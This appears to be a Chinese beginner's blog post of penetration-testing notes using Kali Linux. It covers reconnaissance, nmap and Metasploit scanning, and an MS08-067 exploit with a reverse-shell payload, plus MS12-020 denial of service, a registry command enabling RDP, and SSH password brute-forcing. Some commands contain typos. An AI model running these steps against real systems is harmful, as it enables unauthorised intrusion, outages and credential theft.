Kali Linux入門第二課 | 一次簡單的滲透筆記

下面是最近的一次簡單的滲透攻擊具體思路,涉及到2個系統服務攻擊,記住一步一步的看,雖然很多人都像我一樣對直接入侵電腦感興趣,但是他的前期是枯燥無味,不過一定要一步一步的看完,因爲通往權限的路,很艱難。MS12這個漏洞呢你可以通過msfconsole來進
行滲透,我就說折磨多了,你們自己看吧,雖然不是教程不過很詳細,很容易懂。QQ:1099718640不懂得來問我
此教程僅爲菜鳥,小白,入門提供,大鳥請飛走。
。。。。。。
攻擊前期   信息收集
攻擊中     利用漏洞
攻擊後     後滲透攻擊




網絡踩點  ip踩點
whois域名註冊信息查詢
whois 域名    testfire.net
nslookup與dig域名查詢
查詢服務器上的cache非權威
終端輸入nslookup
進入後set type=A 
域名輸入
exit退出
dig查詢      可以指定具體的服務器查詢
dig ip 域名
IP2location地理位置查詢
www.maxmind.com 國外
www.cz88.net   國內
www.cnwzml.com 國內
netcraft實現信息查詢服務
searchdns.netcraft.com
www.cnwzml.com
ip2Domain反查域名
www.7c.com
www.cnwzml.com
ip-address.com




網絡踩點 搜索引擎
谷歌語法
parent directory site:域名
sete:域名 filetype:xls     xls爲格式
搜索email地址
msf    use auxiliary/gather/search_email_collector




擴普路徑踩點
traceroute  域名
tcptraceroute 域名




主機掃描    找出活躍主機
ping ip    太簡單
ping -c 表示數量
ping -s 表述數據包大小
arping    別躲了  ,必有
arping ip
在arp的基礎上加入網段掃描
arp-scan --interface=eth2 這是網卡 ip/24
nbtscan     掃描
nbtscan ip/24
nmap 最強工具,不解釋
nmap ip
nmap -sn ip/24   加sn不做端口
nmap ip/24
nmap -sS -Pn ip 能掃描到ip,端口,信息,操作
nmap -sV -Pn ip 比上面更加   詳細
nmap -sV ip 能掃描到ip,端口,信息,操作
nmap -A ip 所有信息
msfconsole掃描主機
msfconsole進入
msf   use auxiliary/scanner/discovery/arp_sweep   調用主機掃描模塊
msf   auxiliary(arp_sweep)>show options
msf   set options
msf   set RHOSTS ip
msf   set SMAC 那個網段
msf   set INTERFADE eth2
ip-ip
msf   set THREADs 10    線程
msf   run    執行




系統掃描
xprobe2 ip
nmap -O ip




端口掃描
metaspolit端口掃描
塊不容易被發現
msf use auxiliary/scanner/portscan/syn    端口掃描模塊
msf set RHOSTS ip
msf set THREADS 20 線程數
run執行
back 退出
Nmap 端口服務系統探測
nmap -sS -Pn ip 能掃描到ip,端口,信息,操作
nmap -sV -Pn ip 比上面更加   詳細
nmap -sV ip 能掃描到ip,端口,信息,操作
nmap -A ip 所有信息




漏洞掃描附帶滲透攻擊全程
MS12-020系統高危漏洞
一般開啓3389端口的xp和server 2003都有
DOS開啓windows server 2003
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
藍屏
MS08-067系統高危漏洞的滲透
msf  search ms08_067
msf use exploit/windows/smb/ms08_067_netapi   調用ms08滲透攻擊模塊
msf show payloads    查看載荷
msf set payloads generic/shell_reverse_tcp
msf RHOST ip  設置目標ip
msf set LHOST ip 設置本地ip
msf set LPORT 5000本地端口
msf set target 5 設置目標系統操作代碼爲5,這裏指windows server 2003
msf show options  再次檢查滲透攻擊參數
msf exploit 執行滲透
拿到shell   成功滲透
後面是後滲透攻擊小部分






Telnet網絡查點
用戶賬戶名:口令猜測破解
錯誤配置的共享資源 惡意程序上傳
老舊版本的網絡服務版本 緩衝區於出漏洞攻擊
nmap -sV ip
msf use auxiliary/scanner/telnet/telnet_version   調用模塊
msf set RHOSTS ip/24
msf set THREADS 100  設置線程
msf run
telnet ip




SSH口令破解


msf use auxiliary/scanner/ssh/ssh_login    調用模塊
msf set RHOSTS ip
msf set USERNAME root 賬戶
msf set PASS_FILE/root/wonds.txt  設置目錄
msf set THPEADS 50 設置線程
msf run
Nessus
就是折磨簡單,不過這只是滲透的一部分,由於本人技術原因,也就只能寫到這了,後滲透攻擊,和一些其他的滲透系統攻擊之類的本人還並不會,
   









發佈了50 篇原創文章 · 獲贊 56 · 訪問量 9萬+
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章